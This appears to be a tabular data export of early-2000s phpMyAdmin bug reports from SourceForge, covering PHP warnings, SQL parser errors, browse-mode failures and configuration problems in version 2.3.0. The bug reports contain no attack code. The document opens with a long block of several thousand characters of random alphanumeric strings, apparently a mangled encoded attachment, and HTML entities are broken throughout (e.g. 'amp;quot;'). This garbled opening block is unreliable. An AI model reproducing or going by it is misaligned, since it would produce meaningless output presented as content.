AVsLZy5pGxMX9JdFYXd9dW0kbrm3XcVR81HdU3EMDy7X 9uhupugEo6W8V jRbeE5U OcI44etyUS s Bju9yIZj 2S9en0GVAQy5EIQcx5SgXQzE5NK4rzJla6aMZ qIgUR9LikR BLV5zL1cNzLVh6XqF sSA7zAhJOooIR0sgucV ILOE1xpvJepKJgu7OaqkYOuMdWX IjbxRPZHftMKic dsEEyEzl8cMbMf cFbfgkrNDP1upu iIpyPFK ZEGu5wKX8uGU86kEyGhkyG1fp W9hOrvlaAN68vSBxi5AvPPwFt0ff bcBAZI7FN0Zzrk0lRiIhxJj2xmV8YG2bzgOM B4ShLfY9vzuw o8Emgsnd1DffugIsHE1h40zDEge kQSQgS27KBSkPoYvji1jZHlIahPmkgLlahdfCOoPqqqbcKWg HZ9hb8etxrH5Od53gWlz6tZJyUS9 aMztunJct0O08aDyw25pYzZs12SzhsBAQimCY2BcfXIlPB93 m0K6qUAvismqS2vsf5jUGWPE2rN7 LVra5alFGzy62eMOwG8vcvgb7pdI NjRpV2CaTidVaEKB8R HF2BjD9xY3jjBHFHjHs9dqHgbTeMl yuyZTXaAWVwamLmht4tOJvs pAerYN6kVboPxyc25tcWb QaJ2UO47nuF7chsZKDuwIrwiFI5A6TT ru2NkUGVrlptZ 5FfVPNVHPzKzRPgLrBKMtIBn TQjU6PwBG ArMbmoblxsaYydcQMdtI9EknZwji PLVFhzOeyYHfNk9jGzIVLvP4EF9Ha2sXj4 nQ9eMThIoCsm Ncf Vd1h8K11IaeKaf9114172fgQe sbaVidb4VvStwpD03VD7bbTLefxoLnb8PbLNg106ReHmZH MCbWwjIv8E njWIGwT3RktPdLR0aP t Yg1HA0aZNvFwSu OjItzNSgUj 8o05NChczSK802t6EvcI C7pgeOJx3DruF9OzWR Ems0ykyis M0Zzo3fOWiEJrmVWtFQc XIj8mRWEcODCp flctUR FUvB tc5t0goT3ltKFWUXw8GQduSh6juPP4 L7bA458 Eq1Yz5kC5BrUZqVSeWI3cLMtvYw3fjArm2NelSiL CzJGSYuHLasqKEaRM5haVXmWIx9I mqj2FHQ5ygUD13XxbZKnUebzjcsMmJmdHzJx2pFRzDt 1y BIH1Gxhr85eyd 8wIrYmEXWJEft0tu Ts aV16Vb8hfREyrqvOoReeo7kU rvxrVwRi2gDYI7tRYjNeG vlbkNqsIFZhGEUd7 HTbbSJYk06 2xVBRBtkmAWji1E83Mw xPVcabWTiqyxDXt fP14mpkEkCA JV Uyvyv0MW7E299X C 2 5au07J WTgOnR 6Jc3ejM2v8H hQIgaK5eUlWFLfnZiTjsk7VZ9O Wpu GPsRo P1L27uOel 6fUQebowr veISM16Bp3f3Tt5pfDV Qd04HIpf3 xjcwandY1peTQ2YoG kikj55GlG U4itJV3 MY8jrAUNGw RTAAjY2O UDKxKgvMeIt65xs1bX10plvbc3coydhifEHxBJud Oc1KW69JvUNNKVdarI7WaPMfi0t gH lJoVPTLfJB0Q3SSy MjqNkv9Vr6LfEF3xJAu5tL iWyxPH bFadE1mTnAaXsxLjpPeJxNg72IE XHXk71JPf exzz6gY5fM8u vbLIB0toJsZy70AGwk QK7 UG EwG2xsSdtgtND tZYrgEF6Tfwc y waJ 6cK23pkjFh8OR7iffv8xsgqTOkLjzagYxhPzAFsh64gsV NRQ1Rdo1EIucDCmv 9oQ MsqT4H 0LxZ8HaG4bsefRB8QEfv7E40E5LaNOmx2qzO37Wu3Gt6tm Mzzjb8hgw8NOY3jGg 4FB2RGZhVDza LHxnfviA Ck3pZPUKQPH LUsmtxQmrexOduxETmG31 S5X xQL2kLGGByF2s70XZiDT6NORh8QOag m6j zUdvEZw i5ibTJ9OLEFVZvGRTe24wzD11Ecqh9tbu4 Ta3 YURh8QEZhMPcqk4yiXpnee Yf sHEYLJxIgAVznUakJOptSrLsz7MPgw IPhx6 5DnC2aN4NSy zDZEJYFq2kiJ0QdhIg6diQisly 1 3jlB akXBDR7kyRRuZPxWYXOag3xJHwwbL xGDiQGhej5E JkLUUXDqorMscVq5JEeUQYen6WDcEH 8EiW5 ji83TI8XP Z2M17ciPOMoNJ N5cFLDLVmm3OhNCV zO3GoRp4D4von t2QfumzUVDjafv enR6ujv U0bHQT Hmd5pdIjvdH6Tc WCq1xoNIrljCzzWN6 YXeANXt8l5uAXVrzeQpbKC2wXfywm HvcEIBzMGQ3YO0y6B76VzqCbAdcYl6CqDPfr7KzMbNiQM3P oKNeLf6vR 5Q28AzWdBxbFB9W0yN4 duARrtXf K9G0uDVQCKrIK0AvZuEXTWvUk qguxoi4wPPJ5 mczT4Jsr0ek1aqbTc2JI0xxv61LjD aZOGX1V1 Hpxpn6irzd58SmnK8euxfyOUS7v2ChRcy0v hJb 8wttqf1oyArxHr9A5yjXbrg2cogD 7v5ilpOqA8mj3tpGY3 uIeVJGBKj9jAqoa 4h6FBj uSm7D NrG55bZG7o oMTi2Bl abQkfBhOH cI3WkB7ZzTsAZ0l CyA1bnI3aU oMYGVHZZaJgf8hg7Feaer ZvSfKf1nIvCtTwFd1lCgk7vGptbP J6gQdCtvLrxV3LcIAq9j13oHgEBc7MymXCuHwnfXf4jRj7AT YKm4e41IOLLu BZx1rzTIik2P69J u46jNIXM 7WMDEqi Ig7brHWDCugySfTMa5dvEZLH8n8nE HYdhbNYlw inl5RIzt0d TqgnJgscF S26jzCZEoC8ep7IvSK357BKnXfGasWS3YlqwrLdlCns09XXs Mt5O UIii1Wvin2xsoMlq3ro0fla 1mzHA5oAAKpz05zqxBc8ZUXkPY0ajPwWELex1PzafV3qK0 g6XssTRzT0 CNaZC pJN70pcNjJpFN YU y7bwRt482HWEwqWYUAtsgomPUcV4dVFZuEAy8Mahc wiBIVKkrFPWQ4CCtVrg5RbFMmM8dljHs Bbou17Wd6xprY5YzweSdanQmi4vC y6U ZNTke343fBm3F 5aZwhPGl1fVduqkNI1f5ExF6Nk0Qut SmBhbCIxXw9jahL4Vjk30zjILcaT3pgYQr6vXgPeckls2hpPi YuhsLfKgG85 nDGJ15I50vUGsc lHI9nvcRSHOT UFlwITUqwwIW1yhuTJk eZ7zII4o8FbRTA WFyUEbeESL37p1odlyap4QW49beLE uv Q93k2brO o8M2i0IHMnF7fHxd31R30rnINnHooevd59bI qBs uqVZu64w RAUPsdkU8PMZVAP BhJ0Hgwx Hv1Ozb19J0dj3ccJO aJrzTqjCxbSLFDVQhP6P7 wL1ZoS2X7HC422JL3QqklYwQkLYy D26Tr8qYkXBaKE1Gg9HEbVuMgK6g67tucIzX490ISr8gn4A VTywVTyAxSfZwvqDaGecT nJmUssQ qwcHC1H1NS9t WtpikdoueFFhqTtXGJI2aXsgX8tq XFtood xz4q8ZUgnsAjzutoTlGSaQ8polVK RkS BZ81rAnwWIWR5yAejrAS3gdzvCHJxw EH17KqnnRv GYrZF 2juCDmWuG joCvaMV4gbpFqQv MFraFLgKEMdZdAu4MfonbAtWs mRZ RLCcyTZ0fmnRvPEK Mbca fiI 5M8XWhug vAOQoa GbmSI i4bgwOGqlgmPeBGYhq4aDTr0sUAD4LfK EZmtGpAsKCg5a 3mByJsQJhwW6rXqIZY955DCbORX0O 2l3iAk9ST1FPUEfLljGCD8R8Xd 0nE14mUcqgQ3cPRebpxW 1KZhZ4emrBkq4EUMBoTaBUFpVAU1S U4lr8q8j8QzDhn4s0XulbUTpo6bt4nn1yksZQJOYCtKCnc61P QA1poqKBoOjiPBo8vhuhMUDQdHx RXZ0pPCUsGuiAz9nWrTMwByPFq5PdEl2ycaGpL2ko91mAN NPjFO8ROtCjEwEPpckAEzmD lrG8oo KNjrAEcKu1dafvK2Ew8XgxrebtPBKnTH xMjvE gRX n2o4 US3K4taxsXPk BdVmHnHWRImgQcr PsHQUeaN2aVxtEb spB5p4CarelrNEl8F4KmDzjuaZu izf g OFNW7rE4oAdsGveGf W19dKwxs RBWQ5eq7BtADY6ab KawqT8a2G CoyrgDlDU2BxpY 1gJ9 KEeMBfIiFJW5Cn0nEMj qksLhtY6h h4vRsA5KeYqgr98km6IaT4NEH3fWCX2INFEcl SWbuZatdi N8FdAuMysHAaC 5jELiG2G1NNYVDE usbuA 4lJjB0vaToucClUFsGGcZo7UNAPeEPT H3ACKTsUa QQ0BNr2zWM1ZgOCOLC7cmQ6KvgrFM RvaXbDh4 DSdy0GK0fDyFXN092S3a09wEQYtqyyYTfy8ygw N05jNgJEtEjVoug4YjBQDTOWtCTm7 SEd89UU6uvXwGvj31QraJqekruXfXTIl30ece1d6ZyXy0rCL OMLoYzoYrUKOcsHoJZkXQ74ChiUT hxKcDpKCQ1y5U9nUFgE0mrlm8qaLc4T 6PwdSXXw1ElGT GRTtLMsMbY3P Zp36M8qsluWNoldruu 2KydSKkNdhufFdQQyyF4KII5JQ1Ptp90owuiyqmQ51qaNZiV JJIWCChJZV67eCGz2FqXb2SQE8cN 6gotsY QmvHqF7NY2I5sVIy40Rc7ZApifuO9 tuP44sXLflr0I PN9yYxHLpMu45zNp cO2Y aFwm VRSnaYfe20Mus2Q2SVTjbqPgUj5ha7Pc26LjSj3WkJ2Tx88 zetAYvSjhiYOr1fHiJATULmt06GH9 XXn7Z2uL4DlaP 658w8vXw7ofzqf0 l9tvy8Guv32fPl5zjIz57 jbfqv7fjvDtre2Mns7Xfy7N6t vBusrgNqfs7LOGMO Qq1 Xq4M28dnHCbDgbndOvBQubD 50t92cc7Pjeg8Uy7j3Yr5IVAn0knXdR nsMD8EUG7brtQ3fbX7OPQtJYJwj0MlXYtENDsIXXr7mSBvU yEJ0o0JLSmnWsdyZZWRVy6z29yNhq PjNE27YZI8xVyCCnDu4rrf5myArUR0iGk0Yh25LLLYOgKbbv KQ6s7x1t7d7jeekWLWtu15ksRq7 4q brkLxCmeoeaWhgD4ZmTIjD bwY cyM6aGs17Renk0xQ bpOsHIBD4eDwSsgLCd 1qFRvc6Ln47 wQasU3ZqUuHg8uCpRmDgXsjyYHEXZLl6T8zy6pDxBfceMh 2aJZuMjN0oNKE4We066uHUR6vfT5K1 QZLMXM8IzHWmuEvPY3pRHXStELbyclkA088dlsNfhTHHCS XyiH5rzkXpC89VUalZk l KhPzqfqO jCkT57ndCsT4axNyqcF3Oltt x113 iZYHDCoqPho1l0NLxfDt EX3Mui8rRNPDkKhu4g26b2g lo 1AK1j2Xce54 GvpgdBnEOjwAyKpl p4WH7TycOkejFtwuFj GvYd7jcxefFiV2S3qsmyZS9Vq68z2 cUuP2MUPLx9xvHqKI55dOOLJ8P4jLnc7k 1Fc7AWa9fhzsfj absOd Tj647e35H4g 4365XmSdR0 nrEubPZs5AfeSCjm7YMv5z2PxCHI j7nrz2PvBw9rtZSL6UlZ pIFwzdxE 66BtlM2LE6DeOIPOk Tk5IkC2fdXmIEE FNlh1V 3MzqoUk4VcRg8ldsG0JXMi3f5G g7EbQgwf0Fl7PJGDK GSg7IrOh76 Phf0Q3d0L405fpuaxNXUkfUuCLfVWOhiH VFz IrDh0SqX8e rnmU5dcqJbWB uf41hQClr5ih2ba jA5KzvodgImH9 In7 1 uTH2C59JK1dNgng1Dbx52gwcijr7 F8eBd0bzJqr1daubhRS01yc4Y9J 2Jjng0Ja9cjpRiuaXuZdlcdoJQcfeJrIGWYmjAr0EqBog 4tWf aa D3FtK2dzm5M9jwr4yO2vy54 yKXJI8Qw8MfJrfZ9cpa47TZKDjHainfv1edRn91ocfFo6XGTV hWp2iV8FuOJ PRfXKgkDWHp1hYW tKPPWRoMzEmYyrhWK86o77doHCgz7rSVcqm1r5 VVlycD Dck1fkYnivAAPjygOf5OIeQ Odv0Ypk c6QT9QO f5PpdKuu4mWJUUwpqrzBKKOJW15f Rgtl4iHRI az61xgPPcXOVBuGEUQvEvAPwjuVzqg 2QWlg8e3fi 8Vs2baMe5j925D9xIUzRmxejoywzJ3BV55Kso W2kVzAeDrlTF amYvmKCw3qYn8Zp TdeY2kwkdgEVtNoCNB NdBh Qzs1yS 2gJkrXMmAL yw Gc2oI86GJ39 ZXW2KOFD31RTgdlm3kR 6bhTJaQEHAvVHL4Vujlr8WgOkAQ7km41sUDy28Tm815qa Y cxtvnaqnhUTP54v2bV4 mMBJvYltn rHvXS9Weeavt4t3JoJr05wvVthhSmqAmIYq3tjR0ML5kVcY DuaJVFy yw7XzQlqdwOe kgav H I 6KBI END CUT Original URL https sourceforge.net p phpmyadmin bugs 557 https sourceforge.net p phpmyadmin bugs 557 Original author anonymous","bug"
"24444","6927","2.3.0) non existent class pma sqlvalidator.
If I try to use the validator with any query, I get this php error message and nothing else Fatal error Cannot instantiate non existent class pma sqlvalidator in [PMA dir] libraries sqlvalidator.lib.php on line 67 Original URL https sourceforge.net p phpmyadmin bugs 558 https sourceforge.net p phpmyadmin bugs 558 Original author rabus Found in version 2.3.0","bug"
"24444","6928","2.3.0) Error When Using Validator.
I m trying to get the validator working on my installation, and I ve managed to solve most of my problems Mostly relating to not having XML support compiled in, or not having SOAP in my PEAR install).
However, now I m getting an error I can t figure out.
Here it is Fatal error Call to undefined function opensession ) in home httpd htdocs phpmyadmin libraries sqlvalidator.class.php on line 104 I ve looked through the source, and can t figure out where opensession ) should be coming from.
It appears that it should be on a SOAP client object, but it isn t defined there.
Original URL https sourceforge.net p phpmyadmin bugs 559 https sourceforge.net p phpmyadmin bugs 559 Original author utoxin Found in version 2.3.0","bug"
"24444","6929","Browse table won t display last row.
We have a PostNuke users table with 631 rows.
No matter how we try to amp;quot;Browse amp;quot; the table, we cannot display the last row.
It always displays rows 600 630.
The summary at the top does say amp;quot;Showing rows 601 630 631 total) amp;quot; but the arrows to show the next page aren t displayed.
This bug exists previous to 2.3.0.
We upgraded to see if the problem was resolved and it wasn t.) ) We re using phpMyAdmin 2.3.0 rc2 and MySQL 3.23.49 nt on Win 2k and IIS.
Original URL https sourceforge.net p phpmyadmin bugs 560 https sourceforge.net p phpmyadmin bugs 560 Original author coldrolledsteel Found in version 2.3.0 rc2","bug"
"24444","6930","2.3.0) Uninitialized string offset.
Hello Folks, while doing a count ) SQL query listed below), I encountered the following error message.
I don t know if this problem is a configuration error, but since I have changed nothing but the authorization method and the absolute URL in the config.inc.php, it is likely a amp;quot;real bug amp;quot; ;) Perhaps it ll help..
This bug ist reproducable.
Greets, Carsten Zimmermann, Hamburg Germany Warning Uninitialized string offset 57 in path to phpMyAdmin libraries sqlparser.lib.php on line 401 SELECT count ) FROM `mpp status` WHERE letzterlogin != 0 Original URL https sourceforge.net p phpmyadmin bugs 561 https sourceforge.net p phpmyadmin bugs 561 Original author c zimmermann Found in version 2.3.0","bug"
"24444","6931","2.3.0) Print View Error.
When SQL query statement is too long and calling print view, a error occur.
Print View is using the get method to get the statment which will be chopped off due to the limitation of the length of query string.
Original URL https sourceforge.net p phpmyadmin bugs 562 https sourceforge.net p phpmyadmin bugs 562 Original author anonymous Found in version 2.3.0","bug"
"24444","6932","2.3.0) Undefined variable re.
From the forum in main.php, line 233, undefined re, should be re0 or re1.
Original URL https sourceforge.net p phpmyadmin bugs 563 https sourceforge.net p phpmyadmin bugs 563 Original author lem9 Found in version 2.3.0","bug"
"24444","6933","2.3.0 rc1) structure page.
im not sure if that is still but as for this version!
If you are on the structure page of a table and delete an index you are returned to the SQL page rather than to the struct page again ; Original URL https sourceforge.net p phpmyadmin bugs 564 https sourceforge.net p phpmyadmin bugs 564 Original author anonymous Found in version 2.3.0 rc1","bug"
"24444","6934","SQL pretty printer bugs.
There are a number of bugs that have turned up in how the pretty printer for SQL queries displays output.
Grant revoke statements split a lot GRANT SELECT , INSERT , UPDATE , DELETE ON mnemo memos TO horde; Default values in create table missing spaces CREATE TABLE mnemo memos memo body TEXT, memo category INT NOT NULL DEFAULT0, memo private SMALLINT NOT NULL DEFAULT1 ); Original URL https sourceforge.net p phpmyadmin bugs 565 https sourceforge.net p phpmyadmin bugs 565 Original author robbat2 Found in version 2.3.0","bug"
"24444","6935","2.3.0) relationfeatures wrongly disabled.
using MySQL 4.0.2 alpha nt and phpMyAdmin 2.3.0) Following the provided instructions for creating the tables required for the relationfeatures produces a phpmyadmin database that does NOT work with phpMyAdmin.
The instructions say create tables called amp;quot;PMA relation amp;quot;, etc.
and provides sample SQL code for this, which works great.
HOWEVER.. even after putting amp;quot;PMA relation amp;quot; into the relevant variable in config.inc.php3, phpMyAdmin still says that there is an error in the database config and that the relational features have been disabled!
The workaround is to change the config.inc.php3 variable to all lower case i.e.
amp;quot;pma relation amp;quot; instead).
Either the docs should be updated, or the code should check for the existence of the table in a case insensitive manner..
Original URL https sourceforge.net p phpmyadmin bugs 566 https sourceforge.net p phpmyadmin bugs 566 Original author anonymous Found in version 2.3.0","bug"
"24444","6936","2.3.0) PHP3 compatibility.
Get those errors with php 3.0.18 when browsing table data Warning Bad escape sequence \ in .
libraries sqlparser.lib.php on line 199 Warning Bad escape sequence \` in .
libraries sqlparser.lib.php on line 199 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 488 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 489 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 498 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 705 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 706 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 707 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 727 SQL Befehl [xc3x84ndern] [SQL erklxc3xa4ren] [PHP Code erzeugen] SELECT FROM rdt admin Warning Bad escape sequence \ in .
libraries sqlparser.lib.php on line 199 Warning Bad escape sequence \` in .
libraries sqlparser.lib.php on line 199 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 488 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 489 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 498 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 705 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 706 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 707 Warning NULL is not a valid constant assumed to be amp;quot;NULL amp;quot; in .
libraries sqlparser.lib.php on line 727 LIMIT 0, 30 Warning Uninitialized variable or array index or property text url) in .
libraries display tbl.lib.php on line 477 Warning Uninitialized variable or array index or property url query) in .
libraries display tbl.lib.php on line 877 Warning Uninitialized variable in home web echonet ssl mysql sql.php on line 565 Original URL https sourceforge.net p phpmyadmin bugs 567 https sourceforge.net p phpmyadmin bugs 567 Original author anonymous Found in version 2.3.0","bug"
"24444","6937","2.3.0) RH7 Errors common.lib.php waiting for reply).
I keep on getting this error when trying to use phpMyAdmin on linux redhat 7.2 with latest Apache, php and mysql) Parse error parse error in var www html phpMyAdmin libraries common.lib.php on line 582 Fatal error Call to undefined function pma setfontsizes ) in var www html phpMyAdmin index.php on line 12 Any idea whats the problem?
DOnt have that on Windows...
Thanks Original URL https sourceforge.net p phpmyadmin bugs 568 https sourceforge.net p phpmyadmin bugs 568 Original author anonymous Found in version 2.3.0","bug"
"24444","6938","2.3.0) Delete link doesn t work in browse mode.
Hey, When deleting a row in the Explore tab, nothing happens!
I think it s a bug.
Jeroen jeroen webmensen.nl Original URL https sourceforge.net p phpmyadmin bugs 569 https sourceforge.net p phpmyadmin bugs 569 Original author anonymous Found in version 2.3.0","bug"
"24444","6939","2.3.0) Win XP Apache 2 Error when selecting some tables.
System is WinXP with IE6.
PHP4.2.2 CGI) on Apache 2.0.39.
MySQL 3.23.51 nt.
Whenever I log on I cannot select certain tables 99 out of 100 times.
Other tables work just fine.
I click on the name on the table in the left tab or I click on amp;quot;properties amp;quot; in the listing of the right window I get a amp;quot;Server or DNS not found amp;quot;.
Though sometimes it works.
I haven t yet found a way to reproduce this error systematically.
Seems I have to resort to using Opera the error didn t yet pop up there...
Original URL https sourceforge.net p phpmyadmin bugs 570 https sourceforge.net p phpmyadmin bugs 570 Original author khendraja Found in version 2.3.0","bug"
"24444","6940","2.3.0 rc5 dev) Uninitialized string offset.
There is a Notice Uninitialized string offset 34 in phpMyAdmin 2.3.0 rc5 libraries sqlparser.lib.php on line 401 with query SELECT FROM `tab` WHERE num = 0 but not with SELECT FROM `tab` WHERE num = 0 or SELECT FROM `tab` WHERE num = 1 on PHP Version 4.2.2, Linux indigo 2.2.18, Apache, MySQL 3.23.41, phpMyAdmin 2.3.0 rc5 Best regards Svetlio Original URL https sourceforge.net p phpmyadmin bugs 571 https sourceforge.net p phpmyadmin bugs 571 Original author svetlio Found in version 2.3.0 rc4","bug"
"24444","6941","2.3.0) Cookie auth mode faulty with IIS.
Hi!
Because of a IIS bug, the cookie authentication mode can t be use with this server.
An anonymous user suggested a fix in the help forum https sourceforge.net forum forum.php?
thread id=712916 amp;amp;forum id=72909) and I m currently working on a fix see attached file NOT YET TESTED).
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin bugs 572 https sourceforge.net p phpmyadmin bugs 572 Original author loic1 Found in version 2.3.0","bug"
"24444","6942","2.3.0) Undefined variables.
Notice Undefined variable sort order in xxx phpMyAdmin libraries display tbl.lib.php on line 608 Notice Undefined variable order img in xxx phpMyAdmin libraries display tbl.lib.php on line 630 Notice Undefined variable order img in xxx phpMyAdmin libraries display tbl.lib.php on line 636 Warning REG BADRPT in xxx phpMyAdmin libraries display tbl.lib.php on line 578 PS How can these messages be disabled?
with error reporting) Original URL https sourceforge.net p phpmyadmin bugs 573 https sourceforge.net p phpmyadmin bugs 573 Original author anonymous Found in version 2.3.0","bug"
"24444","6943","self join result display problem.
First I d like to thank phpMyAdmin dev team for truly great work and also apologize if this bug has been reported before I did search ) ) I am having problems with LEFT JOIN queries.
The problem is that I have self join query like this SELECT t1.id,t2.id FROM Table t1 LEFT JOIN Table t2 ON t1.id=t2.parent id) WHERE status id=2 The result should be first column always containing id and second column containing id if match is found otherwise NULL.
But phpMyAdmin displays NULL s in BOTH columns column when the second column is NULL no match found).
t1.id | t2.id | 1 | 3 | match found in joined table NULL |NULL | no match found and somehow thefirst column displays NULL but should not.
Same query works fine with phpMyAdmin 2.2.0 If I use column aliases then the same query works fine.
SELECT t1.id as e,t2.id as f FROM Table t1 LEFT JOIN Table t2 ON t1.id=t2.parent id) WHERE status id=2 e | f | 1 | 3 | match found in joined table 2 |NULL | no match found and second column contains NULL like it should Original URL https sourceforge.net p phpmyadmin bugs 574 https sourceforge.net p phpmyadmin bugs 574 Original author phade Found in version 2.3.0","bug"
"24444","6944","2.3.0) Undefined index Type in tbl properties .
Environment php version 4.0.6 mysql version 3.22.34 php setting error reporting = E ALL When viewing a table the following php warning appears Warning Undefined index Type in c \apache\htdocs\phpmyadmin\tbl properties structure.p hp on line 298 Solution change line 298 of tbl properties structure.php to is innodb = isset showtable[ Type ]) and showtable [ Type ] == InnoDB ); Original URL https sourceforge.net p phpmyadmin bugs 575 https sourceforge.net p phpmyadmin bugs 575 Original author anonymous Found in version 2.3.0","bug"
"24444","6945","404 from 2.3.0 waiting for reply).
I ve got my servers setup to notify me of 404s, and when I loaded up 2.3.0 on a Japanese site I m working on the following mail came through... Query string = Request method = GET Referrer = http www.nz natural.co.nz phpmyadmin main.php?lang=en iso 8859 1 amp;amp;convcharset=SHIFT JIS amp;amp;server=1 IP Address = 203.109.254.59 Requested File = phpmyadmin \ .
images vertical line.gif\ I know PHP pretty well and would look into this myself but I just don t have time right now.
Joel.
Original URL https sourceforge.net p phpmyadmin bugs 576 https sourceforge.net p phpmyadmin bugs 576 Original author joelmurdoch Found in version 2.3.0","bug"
"24444","6946","2.3.0) lower case on table name in sql textarea.
CREATE TABLE `aLLo` `a` VARCHAR 52 ) NOT NULL , `b` VARCHAR 25 ) NOT NULL ) If I use this in SQL Text area the table name is allo and not aLLo Original URL https sourceforge.net p phpmyadmin bugs 577 https sourceforge.net p phpmyadmin bugs 577 Original author moosh fr Found in version 2.3.0","bug"
"24444","6947","2.3.0 rc4) [] in Tablename patch).
I have tables like this tab [] le or project [] and so on.
i want to copy one of this tables.
so i become a regexp error back.
Here is the complete Output BEGIN Warning REG EBRACK in home groups s se server24cms htdocs phpMyAdmin t bl move copy.php3 on line 83 Warning Cannot add header information headers already sent by output started at home groups s se server24cms htdocs phpMyAdmin tbl move copy.php3 83) in home groups s se server24cms htdocs phpMyAdmin l ibraries ob.lib.php3 on line 53 Warning Cannot add header information headers already sent by output started at home groups s se server24cms htdocs phpMyAdmin tbl move copy.php3 83) in home groups s se server24cms htdocs phpMyAdmin header.inc.php3 on line 27 Warning Cannot add header information headers already sent by output started at home groups s se server24cms htdocs phpMyAdmin tbl move copy.php3 83) in home groups s se server24cms htdocs phpMyAdmin header.inc.php3 on line 28 Warning Cannot add header information headers already sent by output started at home groups s se server24cms htdocs phpMyAdmin tbl move copy.php3 83) in home groups s se server24cms htdocs phpMyAdmin header.inc.php3 on line 29 Warning Cannot add header information headers already sent by output started at home groups s se server24cms htdocs phpMyAdmin tbl move copy.php3 83) in home groups s se server24cms htdocs phpMyAdmin header.inc.php3 on line 30 Warning Cannot add header information headers already sent by output started at home groups s se server24cms htdocs phpMyAdmin tbl move copy.php3 83) in home groups s se server24cms htdocs phpMyAdmin header.inc.php3 on line 32 END so i hope this help.
greats enrico Original URL https sourceforge.net p phpmyadmin bugs 578 https sourceforge.net p phpmyadmin bugs 578 Original author estahn Found in version 2.3.0 rc4","bug"
"24444","6948","2.3.0) edit fills current time in datetime fiel.
I have a table with last field date end datetime null).
When this field in DB is null for some record and I try to edit it form for this record shows current time in this field.
Obviously wrong and very dangerous.
It can easily damage data while editing the other fields.
Should be amp;quot;null amp;quot; checkbox should be checked.
Edit box with field data should be blank initially.
Yuri, yuri tsoft.com Original URL https sourceforge.net p phpmyadmin bugs 579 https sourceforge.net p phpmyadmin bugs 579 Original author anonymous Found in version 2.3.0","bug"
"24444","6949","2.3.0) Row coloring on IE 6, and right click.
I downloaded the latest version of phpmyadmin and it is working great.
the new layout is a great improvement.
the only thing that I consider a bug at this point is the table row coloring.
you know?
when you hover with your mouse over the table rows after a select query.
because of the use of amp;quot;onmousedown amp;quot; the line also changes color when right clicked.
when you click on a diverent row after that the row s color stays green the default hover color) and can t be changed by clicking or hovering.
I think this could be easely fixed by using an amp;quot;onClick amp;quot; event instead.
I have this when using either win98 or win2k sp2 with IE6.
Opera 6.05 for windows doesn t have this problem.
if anyone is interested just mail me and I will send a screenshot and some source about what I mean.
with kind regards, Peter Postma SELECTRIC The Netherlands Original URL https sourceforge.net p phpmyadmin bugs 580 https sourceforge.net p phpmyadmin bugs 580 Original author anonymous Found in version 2.3.0","bug"
"24444","6950","Won t edit delete in browse mode.
When browse option selected edit and delete functions unavailable, edit won t wont t work at all because the url seems truncated.
And delete function when pressed sends javascript message amp;quot;Do you really want to amp;quot; when pressed OK sends a error message Line 24 Char 9 Error Invalid pointer Code 0 URL http hostname phpmyadmin sql.php?lang=en iso 8859 1 amp;amp;convcharset=iso 8859 1 amp;amp;db=dbname amp;amp;table=tablename amp;amp;goto=tbl properties.ph p amp;amp;sql query=SELECT 2A FROM 60tablename 60 amp;amp;pos=0 Original URL https sourceforge.net p phpmyadmin bugs 581 https sourceforge.net p phpmyadmin bugs 581 Original author anonymous Found in version 2.3.0","bug"
"24444","6951","Uninitialized string offset waiting reply).
When I run this query amp;quot;SELECT FROM permit line items WHERE LENGTH tmp key ) amp;gt; 0 LIMIT 0, 30 amp;quot; I get the following message above where the query is re displayed.
However if I run the same query with = instead of amp;gt; it works fine.
Tim Original URL https sourceforge.net p phpmyadmin bugs 582 https sourceforge.net p phpmyadmin bugs 582 Original author anonymous Found in version 2.3.0","bug"
"24444","6952","malformed automated SQL generation.
hi, i have serious problems using PhpMyAdmin on OS X 10.2 jaguar).
i installed PHP 4.2.3 http www.entropy.ch ) and mysql 3.23.51 also entropy.ch).
everything s running fine.
i just cannot create fields without getting something like this Database test table adressbuch running on localhost Error SQL query CREATE TABLE `adressbuch` `id` INT NULL , `ame` NULL , `sse` TEXT NULL , PRIMARY KEY `id` ) ) COMMENT = adressbuch test MySQL said You have an error in your SQL syntax near NULL, `sse` TEXT NULL, PRIMARY KEY `id`)) COMMENT = adressbuch test at line 1 Back i re saved all scripts using BBedit, because of the line breaks, using UNIX line breaks.
altough i did a amp;amp; 65279;gzcat on the tar.gz to unpack it... when you look at the above, you see this id` INT NULL , `ame` NULL , `sse` TEXT NULL this should have been `name`, `adresse` not `ame` and `sse`.
under 10.1.5 OS X) it worked all fine.
now it s all belly up... also when i create a table typing in the SQL that works), and then i edit it using the front end, it displays wrong fieldnames or nothing at all), wrong length values and so on... when i use SQL directly i get no errors.
like create table customers customerid int unsigned not null auto increment primary key, name char 30) not null, address char 40) not null, city char 20) not null ); this works fine.
but when i try to do it with the web interface it goes all wrong... am i the only one experiencing this?
cheers, phil Original URL https sourceforge.net p phpmyadmin bugs 583 https sourceforge.net p phpmyadmin bugs 583 Original author cmyck Found in version 2.3.0","bug"
"24444","6953","2.3.0) Random extra characters PHP 4.2.3).
Someone just pointed out to me that phpMyAdmin on one of our webservers is spitting out error messages randomly when working on a database...
Tested it myself, and it seems phpMyAdmin adds extra characters after some status queries randomly, some times it works, some times it doesn t ;)...
